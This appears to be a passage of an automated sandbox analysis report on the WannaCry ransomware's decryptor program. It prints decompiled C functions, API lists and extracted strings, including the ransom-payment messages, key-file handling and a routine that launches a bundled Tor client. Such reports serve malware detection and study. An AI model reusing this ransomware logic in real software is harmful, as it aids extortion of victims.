					 *((intOrPtr*)( *_t281 + 0xc8))( &_v228,  &_v176,  &(_v196.top));
					_v292 = 0x4166e0;
					_v52 = 7;
					if(_v244 == 0) {
						_v284 = 0;
						_v288 = 0;
						_v52 = 6;
					} else {
						_t172 = _v256;
						E00409F80(_v264, _v260, _v256, _v252 - _v260, _v248 - _v256,  &_v292, _v260, _t172, 0xcc0020);
						_t112 =  &_v324; // 0x4166e0
						E00409F10(_t112, _v300);
						_v88 = 6;
					}
				}
				_t133 =  &_v252; // 0x41675c
				_t152 = E00409E20(_t133);
				_v28 = 0;
				L00412E3C();
				_v28 = 0xffffffff;
				L00412DB8();
				 *[fs:0x0] = _v36;
				return _t152;
			}








































































                                                      0x004086e0
                                                      0x004086e0
                                                      0x004086e0
                                                      0x004086e2
                                                      0x004086ed
                                                      0x004086ee
                                                      0x004086fd
                                                      0x00408700
                                                      0x00408708
                                                      0x00408718
                                                      0x0040871f
                                                      0x00408736
                                                      0x00408742
                                                      0x00408743
                                                      0x00408746
                                                      0x0040874f
                                                      0x00408758
                                                      0x00408760
                                                      0x00408765
                                                      0x0040876d
                                                      0x0040877d
                                                      0x00408789
                                                      0x00408791
                                                      0x00408795
                                                      0x00408799
                                                      0x0040879d
                                                      0x004087a1
                                                      0x0040883f
                                                      0x0040884a
                                                      0x0040884e
                                                      0x004087a7
                                                      0x004087ba
                                                      0x004087cd
                                                      0x004087d8
                                                      0x004087dd
                                                      0x00408804
                                                      0x00408809
                                                      0x0040881f
                                                      0x00408823
                                                      0x0040882b
                                                      0x0040882c
                                                      0x00408831
                                                      0x00408831
                                                      0x00408856
                                                      0x0040885e
                                                      0x00408862
                                                      0x00408865
                                                      0x00408867
                                                      0x0040888c
                                                      0x0040888d
                                                      0x00408892
                                                      0x00408869
                                                      0x00408869
                                                      0x0040886f
                                                      0x0040886b
                                                      0x0040886b
                                                      0x0040886b
                                                      0x0040887d
                                                      0x0040887d
                                                      0x0040889e
                                                      0x0040889f
                                                      0x004088a4
                                                      0x004088ae
                                                      0x00408a7d
                                                      0x00408a85
                                                      0x00408a8f
                                                      0x00408ae5
                                                      0x00408ae9
                                                      0x00408a91
                                                      0x00408a91
                                                      0x00408ab9
                                                      0x00408abe
                                                      0x00408ac4
                                                      0x00408ad8
                                                      0x00408add
                                                      0x00408ade
                                                      0x00408ac6
                                                      0x00408ac8
                                                      0x00408acd
                                                      0x00408ace
                                                      0x00408ace
                                                      0x00408ac4
                                                      0x00408aed
                                                      0x004088be
                                                      0x004088c0
                                                      0x004088c9
                                                      0x004088d0
                                                      0x004088dd
                                                      0x004088e4
                                                      0x004088e8
                                                      0x004088ec
                                                      0x004088f0
                                                      0x004088f4
                                                      0x004088f8
                                                      0x004088ff
                                                      0x0040891e
                                                      0x00408901
                                                      0x0040890b
                                                      0x0040890b
                                                      0x0040892d
                                                      0x00408934
                                                      0x00408935
                                                      0x0040893b
                                                      0x0040893d
                                                      0x00408941
                                                      0x00408945
                                                      0x00408949
                                                      0x0040894f
                                                      0x00408951
                                                      0x00408958
                                                      0x0040895c
                                                      0x0040897e
                                                      0x00408980
                                                      0x0040895e
                                                      0x00408963
                                                      0x00408967
                                                      0x0040896d
                                                      0x0040896f
                                                      0x00408974
                                                      0x00408976
                                                      0x00408978
                                                      0x00408978
                                                      0x00408982
                                                      0x00408988
                                                      0x004089d3
                                                      0x004089d7
                                                      0x004089d9
                                                      0x004089d9
                                                      0x004089ec
                                                      0x0040898a
                                                      0x0040899e
                                                      0x004089a5
                                                      0x004089c2
                                                      0x004089a7
                                                      0x004089b0
                                                      0x004089b0
                                                      0x004089a5
                                                      0x00408a05
                                                      0x00408a0b
                                                      0x00408a17
                                                      0x00408a21
                                                      0x00408a6b
                                                      0x00408a6f
                                                      0x00408a73
                                                      0x00408a23
                                                      0x00408a23
                                                      0x00408a4b
                                                      0x00408a54
                                                      0x00408a59
                                                      0x00408a5e
                                                      0x00408a5e
                                                      0x00408a21
                                                      0x00408af5
                                                      0x00408af9
                                                      0x00408b02
                                                      0x00408b09
                                                      0x00408b15
                                                      0x00408b20
                                                      0x00408b2f
                                                      0x00408b3c

                                                      APIs
                                                      • #470.MFC42 ref: 00408708
                                                      • GetClientRect.USER32(?,?), ref: 0040871F
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
                                                      • #6734.MFC42(?,?), ref: 00408746
                                                      • #323.MFC42(?,?), ref: 0040874F
                                                      • CreateCompatibleDC.GDI32(?), ref: 004087D2
                                                      • #1640.MFC42(00000000), ref: 004087DD
                                                        • Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
                                                        • Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E
                                                        • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D
                                                      • #6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
                                                      • FillRect.USER32(?,?,?), ref: 0040887D
                                                      • #2754.MFC42(?,?), ref: 00408892
                                                      • #2381.MFC42(?,?,?), ref: 0040889F
                                                      • #3797.MFC42(?,?,?), ref: 004088C0
                                                      • _ftol.MSVCRT ref: 00408951
                                                      • _ftol.MSVCRT ref: 0040896F
                                                      • FillRect.USER32(?,00000000,00000000), ref: 004089B0
                                                      • #640.MFC42(?,?,?), ref: 00408B09
                                                      • #755.MFC42(?,?,?), ref: 00408B20
                                                        • Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3
                                                        • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Rect$#5785CompatibleCreateFill_ftol$#1640#1641#2381#2754#323#3797#470#6194#640#6734#755BitmapClientMessageSend
                                                      • String ID: \gA$fA$fA
                                                      • API String ID: 1027735583-2217880857
                                                      • Opcode ID: 5bddb1485544efbe4670e3f8524c11794e26297bb4920c3f9f94a116d6947829
                                                      • Instruction ID: b72dd9534e9f1d52b621f8c4883ea919de29669ae4f9aefa89eb3b477b52946b
                                                      • Opcode Fuzzy Hash: 5bddb1485544efbe4670e3f8524c11794e26297bb4920c3f9f94a116d6947829
                                                      • Instruction Fuzzy Hash: 33D12CB16083419FC314DF25C984AAFBBE9BBC8304F508E2EF1D993291DB749949CB56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402AF0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wcsicmp$_wcsnicmpwcsstr
                                                      • String ID: This folder protects against ransomware. Modifying it will reduce protection$Content.IE5$N(@$Temporary Internet Files$\AppData\Local\Temp$\Intel$\Local Settings\Temp$\Program Files$\Program Files (x86)$\ProgramData$\WINDOWS
                                                      • API String ID: 2817753184-2613825984
                                                      • Opcode ID: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                                      • Instruction ID: 690a6d88e0cbcba8c0a0bc490ea4abea364cf6131422823267360e98b5ddcfca
                                                      • Opcode Fuzzy Hash: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                                      • Instruction Fuzzy Hash: 3831843235162023D520691D7D4AFCB638C8FE5727F554033FD44E52C1E29EB96A82BD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401760 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 140filesynchronizationthreadCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 61%
                                                      			E00401760(void* __ecx) {
				int _v8;
				intOrPtr _v12;
				char _v20;
				struct _IO_FILE* _v32;
				void _v2059;
				void _v2060;
				void _v2571;
				void _v2572;
				char _v2576;
				char _v2604;
				void* _v2608;
				char _v2616;
				void* _v2636;
				void* _v2640;
				void* _t36;
				struct _IO_FILE* _t37;
				signed int _t38;
				unsigned int _t45;
				signed int _t49;
				void* _t50;
				signed int _t67;
				struct _IO_FILE* _t87;
				void* _t94;
				void* _t97;
				intOrPtr _t98;
				void* _t99;

				_push(0xffffffff);
				_push(E004134C6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t98;
				_t99 = _t98 - 0xa28;
				_t94 = __ecx;
				L00412CD4();
				_t36 =  *(__ecx + 0xac);
				if(_t36 != 0) {
					WaitForSingleObject(_t36, 0xbb8);
					TerminateThread( *(_t94 + 0xac), 0);
					CloseHandle( *(_t94 + 0xac));
				}
				_t37 = E0040C670();
				if( *((intOrPtr*)(_t94 + 0xb4)) != 0) {
					L15:
					 *[fs:0x0] = _v12;
					return _t37;
				} else {
					_t37 =  *(_t94 + 0xa8);
					if(_t37 != 1) {
						if(_t37 != 0xffffffff) {
							if(_t37 != 2) {
								goto L15;
							}
							_push(0);
							_push(0x40);
							_push("Congratulations! Your payment has been checked!\nStart decrypting now!");
							L14:
							L00412CC8();
							goto L15;
						}
						if( *((intOrPtr*)(_t94 + 0xa0)) == 0) {
							L11:
							_push(0);
							_push(0xf0);
							_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
							goto L14;
						}
						_t38 = rand();
						asm("cdq");
						_t37 = _t38 / 3;
						if(_t38 % 3 != 0) {
							goto L11;
						}
						_push(0);
						_push(0x30);
						_push("Failed to check your payment!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
						goto L14;
					}
					_v2572 = 0;
					memset( &_v2571, 0, 0x7f << 2);
					asm("stosw");
					asm("stosb");
					_v2060 = 0;
					memset( &_v2059, 0, 0x1ff << 2);
					asm("stosw");
					asm("stosb");
					sprintf( &_v2604, "%08X.dky", 0);
					_t37 = fopen( &_v2604, "rb");
					_t87 = _t37;
					_t99 = _t99 + 0x2c;
					if(_t87 == 0) {
						_push(0);
						_push(0xf0);
						_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
						L00412CC8();
						 *(_t94 + 0xa8) = 0xffffffff;
					} else {
						_t45 = fread( &_v2060, 1, 0x800, _t87);
						fclose(_t87);
						DeleteFileA( &_v2604);
						_t97 =  &_v2060;
						_t67 = _t45 >> 2;
						_t49 = memcpy( &_v2572, _t97, _t67 << 2);
						_push("You have a new message:\n");
						_t50 = memcpy(_t97 + _t67 + _t67, _t97, _t49 & 0x00000003);
						_t99 = _t99 + 0x2c;
						L00412CAA();
						_push( &_v2576);
						_push(_t50);
						_push( &_v2616);
						_v8 = 0;
						L00412CCE();
						_t37 =  *_t50;
						_push(0);
						_push(0x40);
						_push(_t37);
						_v20 = 1;
						L00412CC8();
						_v32 = 0;
						L00412CC2();
						_v32 = 0xffffffff;
						L00412CC2();
					}
					goto L15;
				}
			}





























                                                      0x00401766
                                                      0x00401768
                                                      0x0040176d
                                                      0x0040176e
                                                      0x00401775
                                                      0x0040177e
                                                      0x00401780
                                                      0x00401785
                                                      0x0040178f
                                                      0x00401797
                                                      0x004017a5
                                                      0x004017b2
                                                      0x004017b2
                                                      0x004017b8
                                                      0x004017c3
                                                      0x0040193e
                                                      0x00401948
                                                      0x00401955
                                                      0x004017c9
                                                      0x004017c9
                                                      0x004017d2
                                                      0x004018f9
                                                      0x0040192f
                                                      0x00000000
                                                      0x00000000
                                                      0x00401931
                                                      0x00401932
                                                      0x00401934
                                                      0x00401939
                                                      0x00401939
                                                      0x00000000
                                                      0x00401939
                                                      0x00401901
                                                      0x0040191f
                                                      0x0040191f
                                                      0x00401920
                                                      0x00401925
                                                      0x00000000
                                                      0x00401925
                                                      0x00401903
                                                      0x00401909
                                                      0x0040190f
                                                      0x00401913
                                                      0x00000000
                                                      0x00000000
                                                      0x00401915
                                                      0x00401916
                                                      0x00401918
                                                      0x00000000
                                                      0x00401918
                                                      0x004017e3
                                                      0x004017e7
                                                      0x004017e9
                                                      0x004017eb
                                                      0x004017fa
                                                      0x00401801
                                                      0x00401803
                                                      0x00401810
                                                      0x00401811
                                                      0x00401821
                                                      0x00401827
                                                      0x00401829
                                                      0x0040182e
                                                      0x004018da
                                                      0x004018db
                                                      0x004018e0
                                                      0x004018e5
                                                      0x004018ea
                                                      0x00401834
                                                      0x00401844
                                                      0x0040184d
                                                      0x0040185b
                                                      0x00401863
                                                      0x00401870
                                                      0x00401873
                                                      0x00401877
                                                      0x0040187f
                                                      0x0040187f
                                                      0x00401885
                                                      0x00401892
                                                      0x00401893
                                                      0x00401894
                                                      0x00401895
                                                      0x0040189c
                                                      0x004018a1
                                                      0x004018a3
                                                      0x004018a4
                                                      0x004018a6
                                                      0x004018a7
                                                      0x004018af
                                                      0x004018b8
                                                      0x004018bf
                                                      0x004018c8
                                                      0x004018d3
                                                      0x004018d3
                                                      0x00000000
                                                      0x0040182e

                                                      APIs
                                                      • #6453.MFC42 ref: 00401780
                                                      • WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
                                                      • TerminateThread.KERNEL32(?,00000000), ref: 004017A5
                                                      • CloseHandle.KERNEL32(?), ref: 004017B2
                                                      • sprintf.MSVCRT ref: 00401811
                                                      • fopen.MSVCRT ref: 00401821
                                                      • fread.MSVCRT ref: 00401844
                                                      • fclose.MSVCRT ref: 0040184D
                                                      • DeleteFileA.KERNEL32(?), ref: 0040185B
                                                      • #537.MFC42(You have a new message:), ref: 00401885
                                                      • #924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
                                                      • #1200.MFC42 ref: 004018AF
                                                      • #800.MFC42 ref: 004018BF
                                                      • #800.MFC42 ref: 004018D3
                                                      • #1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5
                                                      Strings
                                                      • You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
                                                      • Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
                                                      • You have a new message:, xrefs: 00401877
                                                      • Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
                                                      • %08X.dky, xrefs: 0040180A
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1200#800$#537#6453#924CloseDeleteFileHandleObjectSingleTerminateThreadWaitfclosefopenfreadsprintf
                                                      • String ID: %08X.dky$Congratulations! Your payment has been checked!Start decrypting now!$Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.$You have a new message:
                                                      • API String ID: 2207195628-1375496427
                                                      • Opcode ID: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                                      • Instruction ID: 8b94a0d45af64711c1f2f56a46f7a966efbefe6460f93d7d0814001cf74dce0a
                                                      • Opcode Fuzzy Hash: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                                      • Instruction Fuzzy Hash: 1D41F371244740EFC330DB64C895BEB7699AB85710F404A3EF25AA32E0DABC5944CB6B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405E10 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 144COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E00405E10(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				void* _t86;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				intOrPtr _t132;

				_push(0xffffffff);
				_push(E00413C65);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t132;
				_v20 = __ecx;
				_v4 = 0;
				_t121 = __ecx + 0x890;
				_v16 = _t121;
				 *_t121 = 0x415c00;
				_v4 = 0x1d;
				L00412D52();
				 *_t121 = 0x415bec;
				_t122 = __ecx + 0x888;
				_v16 = _t122;
				 *_t122 = 0x415c00;
				_v4 = 0x1e;
				L00412D52();
				 *_t122 = 0x415bec;
				_t123 = __ecx + 0x880;
				_v16 = _t123;
				 *_t123 = 0x415c00;
				_v4 = 0x1f;
				L00412D52();
				 *_t123 = 0x415bec;
				_t124 = __ecx + 0x878;
				_v16 = _t124;
				 *_t124 = 0x415c00;
				_v4 = 0x20;
				L00412D52();
				 *_t124 = 0x415bec;
				_v4 = 0x18;
				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
				E00403F20(__ecx + 0x870);
				_v4 = 0x17;
				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
				E00403F20(__ecx + 0x868);
				_v4 = 0x16;
				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
				E00403F20(__ecx + 0x860);
				_v4 = 0x15;
				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
				E00403F20(__ecx + 0x858);
				_t125 = __ecx + 0x850;
				_v16 = _t125;
				 *_t125 = 0x415c00;
				_v4 = 0x21;
				L00412D52();
				 *_t125 = 0x415bec;
				_v4 = 0x13;
				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
				E00403F20(__ecx + 0x848);
				_v4 = 0x12;
				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
				E00403F20(__ecx + 0x840);
				_v4 = 0x11;
				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
				E00403F20(__ecx + 0x838);
				_t126 = __ecx + 0x830;
				_v16 = _t126;
				 *_t126 = 0x415c00;
				_v4 = 0x22;
				L00412D52();
				 *_t126 = 0x415bec;
				_v4 = 0xf;
				L00412CC2();
				_v4 = 0xe;
				L00412CC2();
				_v4 = 0xd;
				L00412CC2();
				_v4 = 0xc;
				L00412CC2();
				_v4 = 0xb;
				L00412EF6();
				_v4 = 0xa;
				E004050A0(__ecx + 0x444);
				_v4 = 9;
				E004050A0(__ecx + 0x3c8);
				_v4 = 8;
				E00404170(__ecx + 0x360);
				_v4 = 7;
				E00404170(__ecx + 0x2f8);
				_v4 = 6;
				E00404170(__ecx + 0x290);
				_v4 = 5;
				E00404170(__ecx + 0x228);
				_t127 = __ecx + 0x1a4;
				_v16 = _t127;
				 *_t127 = 0x4161a4;
				_v4 = 0x23;
				L00412F0E();
				_v4 = 4;
				L00412C9E();
				_v4 = 3;
				_t86 = E00405D90(__ecx + 0x120);
				_v4 = 2;
				L00412EF0();
				_v4 = 1;
				L00412EF0();
				_v4 = 0;
				L00412D4C();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t86;
			}
















                                                      0x00405e10
                                                      0x00405e12
                                                      0x00405e1d
                                                      0x00405e1e
                                                      0x00405e2c
                                                      0x00405e30
                                                      0x00405e38
                                                      0x00405e3e
                                                      0x00405e42
                                                      0x00405e4a
                                                      0x00405e4f
                                                      0x00405e54
                                                      0x00405e5a
                                                      0x00405e60
                                                      0x00405e64
                                                      0x00405e6c
                                                      0x00405e71
                                                      0x00405e76
                                                      0x00405e7c
                                                      0x00405e82
                                                      0x00405e86
                                                      0x00405e8e
                                                      0x00405e93
                                                      0x00405e98
                                                      0x00405e9e
                                                      0x00405ea4
                                                      0x00405ea8
                                                      0x00405eb0
                                                      0x00405eb5
                                                      0x00405ec0
                                                      0x00405ec6
                                                      0x00405ecb
                                                      0x00405ed1
                                                      0x00405edc
                                                      0x00405ee1
                                                      0x00405ee7
                                                      0x00405ef2
                                                      0x00405ef7
                                                      0x00405efd
                                                      0x00405f08
                                                      0x00405f0d
                                                      0x00405f13
                                                      0x00405f18
                                                      0x00405f1e
                                                      0x00405f22
                                                      0x00405f2a
                                                      0x00405f2f
                                                      0x00405f3a
                                                      0x00405f40
                                                      0x00405f45
                                                      0x00405f4b
                                                      0x00405f56
                                                      0x00405f5b
                                                      0x00405f61
                                                      0x00405f6c
                                                      0x00405f71
                                                      0x00405f77
                                                      0x00405f7c
                                                      0x00405f82
                                                      0x00405f86
                                                      0x00405f8e
                                                      0x00405f93
                                                      0x00405f9e
                                                      0x00405fa4
                                                      0x00405fa9
                                                      0x00405fb4
                                                      0x00405fb9
                                                      0x00405fc4
                                                      0x00405fc9
                                                      0x00405fd4
                                                      0x00405fd9
                                                      0x00405fe4
                                                      0x00405fe9
                                                      0x00405ff4
                                                      0x00405ff9
                                                      0x00406004
                                                      0x00406009
                                                      0x00406014
                                                      0x00406019
                                                      0x00406024
                                                      0x00406029
                                                      0x00406034
                                                      0x00406039
                                                      0x00406044
                                                      0x00406049
                                                      0x0040604e
                                                      0x00406054
                                                      0x00406058
                                                      0x00406061
                                                      0x00406066
                                                      0x0040606d
                                                      0x00406072
                                                      0x0040607d
                                                      0x00406082
                                                      0x0040608d
                                                      0x00406092
                                                      0x0040609d
                                                      0x004060a2
                                                      0x004060aa
                                                      0x004060af
                                                      0x004060b6
                                                      0x004060be
                                                      0x004060c9
                                                      0x004060d3

                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5
                                                        • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
                                                      • #781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9
                                                        • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                                        • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                                        • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                        • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                      • #654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
                                                      • #765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072
                                                        • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                                        • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                                      • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
                                                      • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
                                                      • #616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
                                                      • #641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#800$#609#654#765#795$#616#641#781
                                                      • String ID: #
                                                      • API String ID: 2377847243-1885708031
                                                      • Opcode ID: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                                      • Instruction ID: 200a364df958368678b01019567048f7f095356612ddb79f46c50176d87071e4
                                                      • Opcode Fuzzy Hash: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                                      • Instruction Fuzzy Hash: C4710A74008782CED305EF65C0453DAFFE4AFA5348F54484EE0DA57292DBB86299CBE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040B840 Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 138synchronizationprocessfileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E0040B840() {
				void _v519;
				char _v520;
				void _v1039;
				char _v1040;
				struct _STARTUPINFOA _v1108;
				struct _PROCESS_INFORMATION _v1124;
				char _t29;
				void* _t46;
				char _t47;
				void* _t55;
				void* _t56;
				void* _t84;
				void* _t86;

				_t29 =  *0x421798; // 0x0
				_v1040 = _t29;
				memset( &_v1039, 0, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				sprintf( &_v1040, "%s\\%s\\%s", "TaskData", "Tor", "taskhsvc.exe");
				_t84 =  &_v1124 + 0x20;
				if(GetFileAttributesA( &_v1040) != 0xffffffff) {
					L8:
					_v1108.cb = 0x44;
					_v1124.hProcess = 0;
					memset( &(_v1108.lpReserved), 0, 0x10 << 2);
					_v1124.hThread = 0;
					_v1124.dwProcessId = 0;
					_v1124.dwThreadId = 0;
					_v1108.wShowWindow = 0;
					_v1108.dwFlags = 1;
					if(CreateProcessA(0,  &_v1040, 0, 0, 0, 0x8000000, 0, 0,  &_v1108,  &_v1124) != 0) {
						if(WaitForSingleObject(_v1124.hProcess, 0x1388) == 0x102) {
							WaitForSingleObject(_v1124.hProcess, 0x7530);
						}
						CloseHandle(_v1124);
						CloseHandle(_v1124.hThread);
						return 1;
					} else {
						return 0;
					}
				} else {
					_t46 = E0040B6A0("TaskData", "s.wnry", 0);
					_t86 = _t84 + 0xc;
					if(_t46 != 0) {
						L5:
						_t47 =  *0x421798; // 0x0
						_v520 = _t47;
						memset( &_v519, 0, 0x81 << 2);
						asm("stosw");
						asm("stosb");
